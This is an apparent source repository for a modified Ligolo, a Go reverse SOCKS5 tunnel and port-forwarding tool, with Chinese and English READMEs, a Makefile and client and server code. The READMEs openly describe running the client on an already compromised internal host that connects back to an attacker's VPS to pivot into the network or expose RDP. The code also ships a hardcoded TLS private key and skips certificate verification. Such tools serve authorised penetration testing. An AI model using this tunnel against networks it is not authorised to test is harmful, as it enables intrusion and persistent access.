├── .gitignore
├── LICENSE
├── Makefile
├── README.md
├── README_EN.md
├── cmd
├── ligoloc
│ └── main.go
└── ligolos
│ └── main.go
├── go.mod
├── go.sum
└── lib.go
/.gitignore:
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578 |
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/Makefile:
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1 | CLIENT_SOURCE=./cmd/ligoloc
2 | SERVER_SOURCE=./cmd/ligolos
3 | TLS_CERT ?= 'certs/cert.pem'
4 | LDFLAGSOLD="-s -w -X main.tlsFingerprint=$$(openssl x509 -fingerprint -sha256 -noout -in $(TLS_CERT) | cut -d '=' -f2)"
5 | LDFLAGS="-s -w"
6 | GCFLAGS="all=-trimpath=$GOPATH"
7 |
8 | CLIENT_BINARY=ligoloc
9 | SERVER_BINARY=ligolos
10 | TAGS=release
11 |
12 | OSARCH = "linux/amd64 linux/386 windows/amd64 windows/386 darwin/amd64"
13 |
14 | TLS_HOST ?= 'ligolo.lan'
15 |
16 | .DEFAULT: help
17 |
18 | help: ## Show Help
19 | @grep -E '^[a-zA-Z_-]+:.*?## .*$$' $(MAKEFILE_LIST) | awk 'BEGIN {FS = ":.*?## "}; {printf "\033[36m%-30s\033[0m %s\n", $$1, $$2}'
20 |
21 | dep: ## Install dependencies
22 | go get -d -v ./...
23 | go get -u github.com/mitchellh/gox
24 |
25 | certs: ## Build SSL certificates
26 | mkdir certs
27 | cd certs && go run `go env GOROOT`/src/crypto/tls/generate_cert.go -ecdsa-curve P256 -ed25519 -host $(TLS_HOST)
28 |
29 | build: ## Build for the current architecture.
30 | go build -ldflags $(LDFLAGS) -gcflags $(GCFLAGS) -tags $(TAGS) -o bin/$(CLIENT_BINARY) $(CLIENT_SOURCE) && \
31 | go build -ldflags $(LDFLAGS) -gcflags $(GCFLAGS) -tags $(TAGS) -o bin/$(SERVER_BINARY) $(SERVER_SOURCE)
32 |
33 | build-all: ## Build for every architectures.
34 | gox -osarch=$(OSARCH) -ldflags=$(LDFLAGS) -gcflags=$(GCFLAGS) -tags $(TAGS) -output "bin/$(SERVER_BINARY)_{{.OS}}_{{.Arch}}" $(SERVER_SOURCE)
35 | gox -osarch=$(OSARCH) -ldflags=$(LDFLAGS) -gcflags=$(GCFLAGS) -tags $(TAGS) -output "bin/$(CLIENT_BINARY)_{{.OS}}_{{.Arch}}" $(CLIENT_SOURCE)
36 |
37 | clean:
38 | rm -rf certs
39 | rm bin/$(SERVER_BINARY)_*
40 | rm bin/$(CLIENT_BINARY)_*
41 |
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1 | # Ligolo : 用于内网渗透的反向隧道
2 |
3 | [](https://forthebadge.com)
4 | [](https://forthebadge.com)
5 |
6 | 简体中文 | [English](./README_EN.md)
7 |
8 | ## 介绍
9 |
10 | 项目根据 [ligolo](https://github.com/sysdream/ligolo) 修改,主要做一些功能上的裁剪,方便使用.
11 |
12 | **Ligolo** 是一个简单的,轻量级的反向Socks5代理工具及端口映射工具,所有的流量使用TLS加密.
13 |
14 | 其功能类似于*Meterpreter*中的*Autoroute + Socks4a*,但是更加稳定,速度更快.
15 |
16 | ## 使用场景
17 |
18 | 当你已经在对方内网获取到一台 Windows / Linux / Mac 主机的权限且该主机可以连接互联网.
19 |
20 | 此时你想要建立一个对方内网的Socks5代理或需要连接内网某个IP地址的某端口.
21 |
22 | **Ligolo** 可以帮助你建立代理,协助你继续进行内网渗透.
23 |
24 | > 如果已控主机不能访问互联网,可以尝试使用另一款工具 [pystinger](https://github.com/FunnyWolf/pystinger)
25 |
26 | ## 使用方法
27 |
28 | ### Sock5代理
29 |
30 | - 获取已编译的二进制文件 [release](https://github.com/FunnyWolf/ligolo/releases)
31 |
32 | - 在你的VPS主机中.
33 |
34 | ```
35 | ./ligolos
36 | ```
37 |
38 | - 在已控制的内网主机中.
39 |
40 | ```
41 | > ligoloc.exe -s your-vps-ip:443
42 | ```
43 |
44 | - 连接建立成功后,此时VPS的127.0.0.1:1080已经建立已控主机的内网Socks5代理.
45 |
46 | ### 详细说明
47 |
48 | *Ligolo* 包含两个模块:
49 |
50 | - ligolos (server)
51 | - ligoloc (client)
52 |
53 | *ligolos* 运行于你的VPS服务器 (攻击服务器).
54 |
55 | *ligoloc* 运行于已经控制的内网主机.
56 |
57 | *ligolos*可以使用默认设置.它会监听0.0.0.0:443端口(用于等待ligoloc连接)及127.0.0.1:1080(用于socks5代理).
58 |
59 | *ligoloc*运行时必须制定服务端地址,使用参数`-s your-vps-ip:443`.
60 |
61 | 你可以使用`-h`参数查看帮助.
62 |
63 | 一旦*ligolos* 和 *ligoloc* 之间的连接建立成功,你即可使用VPS服务器`127.0.0.1:1080`的内网socks5代理.
64 |
65 |
66 | ### 反向端口映射
67 | - 在你的VPS主机中.
68 |
69 | ```
70 | ./ligolos -p 0.0.0.0:13389
71 | ```
72 |
73 | - 在已控制的内网主机中.
74 |
75 | ```
76 | > ligoloc.exe -s your-vps-ip:443 -t 127.0.0.1:3389
77 | ```
78 |
79 | - 连接建立成功后,已经将以控制内网主机的3389映射到VPS-IP:13389.
80 |
81 |
82 |
83 | ### 选项
84 |
85 | *ligolos* options:
86 |
87 | ```
88 | PS D:\xxx\bin> .\ligolos.exe -h
89 | Usage of D:\xxx\ligolos.exe:
90 | -cert string
91 | The TLS server certificate,Unnecessary (default "cert.pem")
92 | -key string
93 | The TLS server key,Unnecessary (default "key.pem")
94 | -l string
95 | The relay server listening address (the connect-back address) (default "0.0.0.0:443")
96 | -p string
97 | The local socks5 server address or ip:port use to connect target (default "127.0.0.1:1080")
98 | ```
99 |
100 | *ligoloc* options:
101 |
102 | ```
103 | Usage of D:\XXX\ligoloc.exe:
104 | -proxy string
105 | Use proxy to connect ligolo server(e.g. http://user:passwd@192.168.1.128:8080 socks5://user:passwd@192.168.1.128:1080)
106 | -s string
107 | The ligolo server (the connect-back address)(e.g. 0.0.0.0:443)
108 | -t string
109 | The destination server (a 192.168.1.3:3389, 192.168.1.3:22, etc.) - when not specified, Ligolo starts a socks5 proxy server
110 | ```
111 |
112 | ### 编译
113 |
114 | 参考原版ligolo的编译方法
115 |
116 | ## 特性
117 |
118 | - TLS 1.3 加密隧道
119 | - 多平台 (Windows / Linux / Mac / ...)
120 | - 多连接复用 (1 TCP连接传输所有流量)
121 | - SOCKS5代理
122 |
123 | ## To Do
124 |
125 | - 更好的超时机制
126 | - SOCKS5 UDP 支持
127 | - mTLS双向认证
128 |
129 | ## Licensing
130 |
131 | GNU General Public License v3.0 (参考 LICENSING).
132 |
133 | ## 原版作者
134 |
135 | * Nicolas Chatelain
136 |
137 |
138 |
139 |
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1 | # Ligolo: Reverse tunnel for intranet penetration
2 |
3 | [](https://forthebadge.com)
4 | [](https://forthebadge.com)
5 |
6 | English | [简体中文](./README.md)
7 |
8 | ## introduce
9 |
10 | The project is modified according to [ligolo](https://github.com/sysdream/ligolo), mainly for some functional tailoring, which is convenient to use.
11 |
12 | **Ligolo** is a simple, lightweight reverse Socks5 proxy tool, all traffic is encrypted with TLS.
13 |
14 | Its function is similar to *Autoroute + Socks4a* in *Meterpreter*, but it is more stable and faster.
15 |
16 | ## why you need this
17 |
18 | When you have obtained the permission of a Windows / Linux / Mac host on the other party's intranet and the host can connect to the Internet.
19 |
20 | At this point you want to establish a Socks5 proxy for the other party's intranet.
21 |
22 | **Ligolo** can help you establish an agent to help you continue to penetrate the intranet.
23 |
24 | > If the controlled host cannot access the Internet, you can try another tool [pystinger](https://github.com/FunnyWolf/pystinger)
25 |
26 | ## Instructions
27 |
28 | ### TL;DR
29 |
30 | - Get the compiled binary file [release](https://github.com/FunnyWolf/ligolo/releases)
31 |
32 | - In your VPS hosting.
33 |
34 | ```
35 | ./ligolos
36 | ```
37 |
38 | - In the controlled intranet host.
39 |
40 | ```
41 | > ligoloc.exe -s your-vps-ip:443
42 | ```
43 |
44 | - After the connection is successfully established, the 127.0.0.1:1080 of the VPS has established the Socks5 proxy for the internal network of the controlled host.
45 |
46 | ### Detailed description
47 |
48 | *Ligolo* contains two modules:
49 |
50 | - ligolos (server)
51 | - ligoloc (client)
52 |
53 | *ligolos* runs on your VPS server (attack server).
54 |
55 | *ligoloc* runs on an already controlled intranet host.
56 |
57 | *ligolos* can use the default settings. It will listen on port 0.0.0.0:443 (for waiting for ligoloc connection) and 127.0.0.1:1080 (for socks5 proxy).
58 |
59 | *ligoloc* The server address must be specified when running, using the parameter `-s your-vps-ip:443`.
60 |
61 | You can use the `-h` parameter to view the help.
62 |
63 | Once the connection between *ligolos* and *ligoloc* is established, you can use the intranet socks5 proxy of the VPS server `127.0.0.1:1080`.
64 |
65 |
66 | ### Reverse portfwd
67 | - In your VPS host
68 | ```
69 | ./ligolos -p 0.0.0.0:13389
70 | ```
71 | - In controlled intranet host
72 | ```
73 | > ligoloc. exe -s your-vps-ip:443 -t 127.0.0.1:3389
74 | ```
75 | - After the connection is established successfully, the intranet host 127.0.0.1:3389 has been mapped to vps-ip:13389
76 |
77 |
78 | ### Options
79 |
80 | *ligolos* options:
81 |
82 | ```
83 | PS D:\xxx\bin> .\ligolos.exe -h
84 | Usage of D:\xxx\ligolos.exe:
85 | -cert string
86 | The TLS server certificate,Unnecessary (default "cert.pem")
87 | -key string
88 | The TLS server key,Unnecessary (default "key.pem")
89 | -l string
90 | The relay server listening address (the connect-back address) (default "0.0.0.0:443")
91 | -p string
92 | The local socks5 server address or ip:port use to connect target (default "127.0.0.1:1080")
93 | ```
94 |
95 | *ligoloc* options:
96 |
97 | ```
98 | Usage of D:\XXX\ligoloc.exe:
99 | -proxy string
100 | Use proxy to connect ligolo server(e.g. http://user:passwd@192.168.1.128:8080 socks5://user:passwd@192.168.1.128:1080)
101 | -s string
102 | The ligolo server (the connect-back address)(e.g. 0.0.0.0:443)
103 | -t string
104 | The destination server (a 192.168.1.3:3389, 192.168.1.3:22, etc.) - when not specified, Ligolo starts a socks5 proxy server
105 | ```
106 |
107 |
108 | ### Compile
109 |
110 | Refer to the compilation method of the original ligolo
111 |
112 | ## Features
113 |
114 | - TLS 1.3 encrypted tunnel
115 | - Multi-platform (Windows / Linux / Mac /...)
116 | - Multiple connection multiplexing (1 TCP connection transmits all traffic)
117 | - SOCKS5 proxy
118 |
119 | ## To Do
120 |
121 | - Better timeout mechanism
122 | - SOCKS5 UDP support
123 | - mTLS mutual authentication
124 | - Reverse port mapping (mapping intranet port to internet)
125 |
126 | ## Licensing
127 |
128 | GNU General Public License v3.0 (refer to LICENSING).
129 |
130 | ## Original author
131 |
132 | * Nicolas Chatelain
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/cmd/ligoloc/main.go:
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1 | package main
2 |
3 | import (
4 | "bufio"
5 | "crypto/tls"
6 | "encoding/base64"
7 | "flag"
8 | "fmt"
9 | "github.com/armon/go-socks5"
10 | "github.com/hashicorp/yamux"
11 | "github.com/sirupsen/logrus"
12 | "io"
13 | "net"
14 | "net/http"
15 | "net/url"
16 | "time"
17 |
18 | "golang.org/x/net/proxy"
19 | )
20 |
21 | type ProxyAuth struct {
22 | Enable bool
23 | Username string
24 | Passwd string
25 | }
26 |
27 | func DialTcpByProxy(proxyStr string, addr string) (c net.Conn, err error) {
28 | var proxyUrl *url.URL
29 | if proxyUrl, err = url.Parse(proxyStr); err != nil {
30 | return
31 | }
32 |
33 | auth := &ProxyAuth{}
34 | if proxyUrl.User != nil {
35 | auth.Enable = true
36 | auth.Username = proxyUrl.User.Username()
37 | auth.Passwd, _ = proxyUrl.User.Password()
38 | }
39 |
40 | switch proxyUrl.Scheme {
41 | case "http":
42 | return DialTcpByHttpProxy(proxyUrl.Host, addr, auth)
43 | case "socks5":
44 | return DialTcpBySocks5Proxy(proxyUrl.Host, addr, auth)
45 | default:
46 | err = fmt.Errorf("Proxy URL scheme must be http or socks5, not [%s]", proxyUrl.Scheme)
47 | return
48 | }
49 | }
50 |
51 | func DialTcpByHttpProxy(proxyHost string, dstAddr string, auth *ProxyAuth) (c net.Conn, err error) {
52 | if c, err = net.Dial("tcp", proxyHost); err != nil {
53 | return
54 | }
55 |
56 | req, err := http.NewRequest("CONNECT", "http://"+dstAddr, nil)
57 | if err != nil {
58 | return
59 | }
60 | if auth.Enable {
61 | req.Header.Set("Proxy-Authorization", "Basic "+base64.StdEncoding.EncodeToString([]byte(auth.Username+":"+auth.Passwd)))
62 | }
63 | req.Header.Set("User-Agent", "Mozilla/5.0")
64 | req.Write(c)
65 |
66 | resp, err := http.ReadResponse(bufio.NewReader(c), req)
67 | if err != nil {
68 | return nil, err
69 | }
70 | resp.Body.Close()
71 | if resp.StatusCode != 200 {
72 | err = fmt.Errorf("DialTcpByHttpProxy error, StatusCode [%d]", resp.StatusCode)
73 | return
74 | }
75 | return
76 | }
77 |
78 | func DialTcpBySocks5Proxy(proxyHost string, dstAddr string, auth *ProxyAuth) (c net.Conn, err error) {
79 | var s5Auth *proxy.Auth
80 | if auth.Enable {
81 | s5Auth = &proxy.Auth{
82 | User: auth.Username,
83 | Password: auth.Passwd,
84 | }
85 | }
86 |
87 | dialer, err := proxy.SOCKS5("tcp", proxyHost, s5Auth, nil)
88 | if err != nil {
89 | return nil, err
90 | }
91 |
92 | if c, err = dialer.Dial("tcp", dstAddr); err != nil {
93 | return
94 | }
95 | return
96 | }
97 |
98 | func main() {
99 | relayServer := flag.String("s", "", "The ligolo server ip:port (e.g. example.com:443)")
100 | targetServer := flag.String("t", "", "The destination server ip:port (e.g. 192.168.1.3:3389, 192.168.1.3:22, etc.) - when not specified, Ligolo starts a socks5 proxy server")
101 | proxyStr := flag.String("proxy", "", "Use proxy to connect ligolo server(e.g. http://user:passwd@192.168.1.128:8080 socks5://user:passwd@192.168.1.128:1080)")
102 | flag.Parse()
103 | for {
104 | err := StartLigolo(*relayServer, *targetServer, *proxyStr)
105 | if err != nil {
106 | logrus.Error(err)
107 | }
108 | logrus.Warning("Restarting ligolo client...")
109 | time.Sleep(10 * time.Second)
110 | }
111 | }
112 |
113 | func StartLigolo(relayServer string, targetServer string, proxyStr string) error {
114 | var socks *socks5.Server
115 | logrus.Infoln("Connecting to ligolo server...")
116 | config := &tls.Config{InsecureSkipVerify: true}
117 | var conn net.Conn
118 | var err error
119 |
120 | if proxyStr == "" {
121 | conn, err = tls.Dial("tcp", relayServer, config)
122 | if err != nil {
123 | return err
124 | }
125 |
126 | } else {
127 | logrus.Infoln("Using proxy")
128 | conn, err = DialTcpByProxy(proxyStr, relayServer)
129 | if err != nil {
130 | return err
131 | }
132 | conn = tls.Client(conn, config)
133 | }
134 | socks, err = startSocksProxy()
135 | if err != nil {
136 | logrus.Error("Could not start SOCKS5 proxy !")
137 | return err
138 | }
139 |
140 | session, err := yamux.Client(conn, nil)
141 | if err != nil {
142 | return err
143 | }
144 |
145 | logrus.Infoln("Waiting for connections....")
146 |
147 | for {
148 | stream, err := session.Accept()
149 | if err != nil {
150 | return err
151 | }
152 | logrus.WithFields(logrus.Fields{"active_sessions": session.NumStreams()}).Println("Accepted new connection !")
153 | // When no targetServer are specified, starts a socks5 proxy
154 | if targetServer == "" {
155 | go socks.ServeConn(stream)
156 | } else {
157 | proxyConn, err := net.Dial("tcp", targetServer)
158 | if err != nil {
159 | logrus.Errorf("Error creating Proxy TCP connection ! Error : %s\n", err)
160 | return err
161 | }
162 | go handleRelay(stream, proxyConn)
163 | }
164 | }
165 |
166 | }
167 |
168 | func startSocksProxy() (*socks5.Server, error) {
169 | conf := &socks5.Config{}
170 | socks, err := socks5.New(conf)
171 | if err != nil {
172 | logrus.Error("Could not start SOCKS5 proxy !")
173 | return nil, err
174 | }
175 | return socks, nil
176 | }
177 |
178 | func handleRelay(src net.Conn, dst net.Conn) {
179 | stop := make(chan bool, 2)
180 |
181 | go relay(src, dst, stop)
182 | go relay(dst, src, stop)
183 |
184 | select {
185 | case <-stop:
186 | return
187 | }
188 | }
189 |
190 | func relay(src net.Conn, dst net.Conn, stop chan bool) {
191 | io.Copy(dst, src)
192 | dst.Close()
193 | src.Close()
194 | stop <- true
195 | return
196 | }
197 |
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/cmd/ligolos/main.go:
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1 | package main
2 |
3 | import (
4 | "crypto/tls"
5 | "flag"
6 | "fmt"
7 | "github.com/hashicorp/yamux"
8 | "github.com/sirupsen/logrus"
9 | "io"
10 | Ligolo "ligolo"
11 | "net"
12 | )
13 |
14 | func main() {
15 | localServer := flag.String("p", "127.0.0.1:1080", "The local socks5 server address or ip:port to connect")
16 | relayServer := flag.String("l", "0.0.0.0:443", "The relay server listening address (the connect-back address)")
17 | certFile := flag.String("cert", "cert.pem", "The TLS server certificate,Unnecessary")
18 | keyFile := flag.String("key", "key.pem", "The TLS server key,Unnecessary")
19 |
20 | flag.Parse()
21 |
22 | relay := NewLigoloRelay(*localServer, *relayServer, *certFile, *keyFile)
23 | relay.Start()
24 | }
25 |
26 | // LigoloRelay structure contains configuration, the current session and the ConnectionPool
27 | type LigoloRelay struct {
28 | LocalServer string
29 | RelayServer string
30 | CertFile string
31 | KeyFile string
32 | ConnectionPool chan *yamux.Session
33 | Session *yamux.Session
34 | }
35 |
36 | // NewLigoloRelay creates a new LigoloRelay struct
37 | func NewLigoloRelay(localServer string, relayServer string, certFile string, keyFile string) *LigoloRelay {
38 | return &LigoloRelay{LocalServer: localServer, RelayServer: relayServer, CertFile: certFile, KeyFile: keyFile, ConnectionPool: make(chan *yamux.Session, 100)}
39 | }
40 |
41 | // Start listening for local and relay connections
42 | func (ligolo LigoloRelay) Start() {
43 |
44 | logrus.WithFields(logrus.Fields{"socks5server": ligolo.LocalServer, "ligoloserver": ligolo.RelayServer}).Println("Ligolo server started.")
45 | go ligolo.startRelayHandler()
46 | ligolo.startLocalHandler()
47 | }
48 |
49 | // Listen for Ligolo connections
50 | func (ligolo LigoloRelay) startRelayHandler() {
51 |
52 | cer, err := tls.LoadX509KeyPair(ligolo.CertFile, ligolo.KeyFile)
53 | if err != nil {
54 | cer, _ = tls.X509KeyPair([]byte(Ligolo.CertPEM), []byte(Ligolo.KeyPEM))
55 | //
56 | //logrus.Warning("Could not load TLS certificate.")
57 | //return
58 | }
59 |
60 | config := &tls.Config{Certificates: []tls.Certificate{cer}}
61 | listener, err := tls.Listen("tcp4", ligolo.RelayServer, config)
62 | if err != nil {
63 | logrus.Errorf("Could not bind to port : %v\n", err)
64 | return
65 | }
66 | defer listener.Close()
67 | for {
68 | c, err := listener.Accept()
69 | if err != nil {
70 | logrus.Errorf("Could not accept connection : %v\n", err)
71 | return
72 | }
73 |
74 | session, err := handleRelayConnection(c)
75 | if err != nil {
76 | logrus.Errorf("Could not start session : %v\n", err)
77 | continue
78 | }
79 | ligolo.ConnectionPool <- session
80 | }
81 |
82 | }
83 |
84 | // Listen for local connections
85 | func (ligolo LigoloRelay) startLocalHandler() {
86 | listener, err := net.Listen("tcp4", ligolo.LocalServer)
87 | if err != nil {
88 | fmt.Println(err)
89 | return
90 | }
91 | defer listener.Close()
92 | ligolo.Session = <-ligolo.ConnectionPool
93 | go func() {
94 | for {
95 | <-ligolo.Session.CloseChan()
96 | logrus.WithFields(logrus.Fields{"remoteaddr": ligolo.Session.RemoteAddr()}).Println("Received session shutdown.")
97 | ligolo.Session = <-ligolo.ConnectionPool
98 | logrus.WithFields(logrus.Fields{"remoteaddr": ligolo.Session.RemoteAddr()}).Println("New session acquired.")
99 | }
100 | }()
101 | logrus.Println("Session acquired. Starting relay.")
102 | for {
103 | conn, err := listener.Accept()
104 | if err != nil {
105 | fmt.Println(err)
106 | return
107 | }
108 |
109 | go ligolo.handleLocalConnection(conn)
110 | }
111 | }
112 |
113 | // Handle new local connections
114 | func (ligolo LigoloRelay) handleLocalConnection(conn net.Conn) {
115 | if ligolo.Session.IsClosed() {
116 | logrus.Warning("Closing connection because no session available !")
117 | conn.Close()
118 | return
119 | }
120 |
121 | logrus.Println("New proxy connection. Establishing new session.")
122 |
123 | stream, err := ligolo.Session.Open()
124 | if err != nil {
125 | logrus.Errorf("Could not open session : %s\n", err)
126 | return
127 | }
128 |
129 | logrus.Println("Yamux session established.")
130 |
131 | go relay(conn, stream)
132 | go relay(stream, conn)
133 |
134 | }
135 |
136 | // Handle new ligoloc connections
137 | func handleRelayConnection(conn net.Conn) (*yamux.Session, error) {
138 | logrus.WithFields(logrus.Fields{"remoteaddr": conn.RemoteAddr().String()}).Info("New relay connection.\n")
139 | session, err := yamux.Server(conn, nil)
140 | if err != nil {
141 | return nil, err
142 | }
143 | ping, err := session.Ping()
144 | if err != nil {
145 | return nil, err
146 | }
147 | logrus.Printf("Session ping : %v\n", ping)
148 | return session, nil
149 | }
150 |
151 | func relay(src net.Conn, dst net.Conn) {
152 | io.Copy(dst, src)
153 | dst.Close()
154 | src.Close()
155 | return
156 | }
157 |
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/go.mod:
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1 | module ligolo
2 |
3 | go 1.13
4 |
5 | require (
6 | github.com/armon/go-socks5 v0.0.0-20160902184237-e75332964ef5
7 | github.com/hashicorp/go-version v1.2.0 // indirect
8 | github.com/hashicorp/yamux v0.0.0-20190923154419-df201c70410d
9 | github.com/mitchellh/gox v1.0.1 // indirect
10 | github.com/sirupsen/logrus v1.4.2
11 | golang.org/x/lint v0.0.0-20200130185559-910be7a94367 // indirect
12 | golang.org/x/net v0.0.0-20200202094626-16171245cfb2 // indirect
13 | golang.org/x/tools v0.0.0-20200213144451-3187b3c41574 // indirect
14 | )
15 |
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/lib.go:
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1 | package ligolo
2 |
3 | const CertPEM = `-----BEGIN CERTIFICATE-----
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35 | -----END CERTIFICATE-----`
36 | const KeyPEM = `-----BEGIN PRIVATE KEY-----
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76 | LWj/waq3/G4tto1+tGprPN59F6Uz/90izvpNwEtfQYtbUH1MCpfxO0paZqxkzFh9
77 | rT70xYHH5wPDRg0YzW9MsuBbKAS8mR/dsVA1u3P2kdxe1idUQPCiiwDioNDnRZrF
78 | fI1Anj7Zux3Un8ZoNVyrigEUAwJWauFgXLuLr/YSI6mgs5dfHFEV5P5f25odC76C
79 | MwD0cgMs/wUL7bIk3eu7ReRc50GvlD6Az7hek/9fzA5AHJZLBzgigWBoHq4aqkrv
80 | tD9IdfOQ8w+qUyRqi8qI6tlH5k5hH4JOiAvp0SbgGNoFispYW5oHHuVe6zKVD6Mq
81 | SyXeAQKCAQAlR6JwsOEa4XEMJlBdHL9W267hrPmUxne5HvN5wRMPVyGSUYpKt1Ia
82 | 0R/JEKtMjMvfyAnzg4MoXvWMtfC3UdmGBRqAK5Sab4JyoIY/I4jaDEQgZ2lcnygt
83 | DUC5DJIxzzO7ADcFqHkwHY5Is7B+n0McAXFrQY3HyFJrtwGYNhIf0ytLFViN5K/e
84 | KIKge7qaZNNXmFRyfOijz3A/uMq30bPTpMDomOfgbfaYNja97e4b4yaAiHxvYnMG
85 | H/9Jw7gUKFJtUPwATqcwRGoH/Kx+uIZ19s30SSMNTsYMwz2Jmsh6m5dviVCOkhbH
86 | jWHDR/wbFe00CkzhKvFxOHlilDkQc8bG
87 | -----END PRIVATE KEY-----`
88 |
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